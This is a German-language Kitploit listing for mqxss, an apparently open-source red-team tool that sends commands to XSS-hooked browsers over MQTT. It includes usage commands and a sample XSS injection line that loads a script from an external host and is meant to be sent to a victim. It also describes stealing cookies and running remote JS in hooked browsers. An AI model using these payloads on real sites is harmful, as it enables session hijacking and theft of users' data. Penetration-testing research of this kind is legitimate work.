Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
mqxss — Hooked-Browser-Kommunikation über MQTT | Kitploit
Tools/GitHubGitHub/grampae/mqxss
Payload-GenerierungWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubgrampae/mqxss

mqxss

Hooked-Browser-Kommunikation über MQTT

Repository anzeigen
8vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

mqxss v0.2

mqxss fungiert als Client zur Kommunikation mit gehookten Browsern über MQTT

Screenshot from 2023-07-03 15-15-35

Der Vorteil gegenüber beef oder xsshunter ist, dass außer dem Hosten der JS-Payload keine Infrastruktur eingerichtet werden muss; du kannst einen öffentlichen Broker verwenden (allerdings wird derzeit Obfuskation genutzt, Verschlüsselung ist in Arbeit).

Gehookte Browser kommunizieren über das MQTT-Topic auf dem von dir angegebenen Broker. Es gibt viele öffentliche/kostenlose Broker, um dies zu testen.

Der Client verwendet die Python-Bibliothek paho.mqtt, während die JS-Payload 'mqttws31.min.js' verwendet, die er von hier 'https://cdnjs.cloudflare.com/ajax/libs/paho-mqtt/1.0.1/mqttws31.min.js' bezieht.


Anleitung

Screenshot from 2024-01-17 11-34-59

Um eine JS-Payload zu erzeugen, um Browser zu hooken, setze zur Laufzeit das Flag -g zusammen mit deinen Broker-, Port- und Topic-Variablen. Dadurch wird deine Payload im Ordner /js/ erstellt.

Um den Client auszuführen, gib deinen Broker, Port und dein Topic wie folgt an:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname

Um den Client mit Anmeldedaten auszuführen, gib deinen Broker, Port, Benutzernamen, Passwort und dein Topic wie folgt an:

mqxss.py -p 8081 -b some.mqtt.broker.com -t mytopicname -u username -pw password

Sende deine XSS-Payload an das Opfer, während der mqxss-Client läuft, z. B.: '"><script src=https://example.com/x.js async></script> oder etwas Ähnliches. Wenn die Seite verwundbar ist, solltest du eine Benachrichtigung erhalten, dass der Browser mit einigen grundlegenden Details (einschließlich Cookies usw.) verbunden ist.

a


Funktionen:

  • JS-Payload verwendet MQTT QoS 1 und Last Will; mqxss wird über Trennungen oder Verbindungen benachrichtigt, die auftreten, während der Client nicht mit dem Broker verbunden ist
  • JS-Payload zur Laufzeit erzeugen, um Browser zu hooken
  • funktioniert derzeit nur mit MQTT-Brokern, die sichere WebSockets verwenden
  • gehookten Browser-Standort mit erfassten Cookies im Browser zur Bequemlichkeit öffnen
  • beim Hooken werden Cookies, IP, Gerätetyp und User-Agent erfasst
  • frühere gehookte (nicht mehr gehookte) Browser anzeigen
  • JS an aktuell gehookte Browser senden und die Antwort erhalten, sofern verfügbar
  • Screenshot des gehookten Browsers
  • Benutzer und Passwort zur Laufzeit für Broker setzen, die dies erfordern
  • Pushover-Benachrichtigung durch Setzen der Variablen ptoken und userkey in mqxss.py und anschließender Verwendung des Befehlszeilenflags -po
Tool herunterladen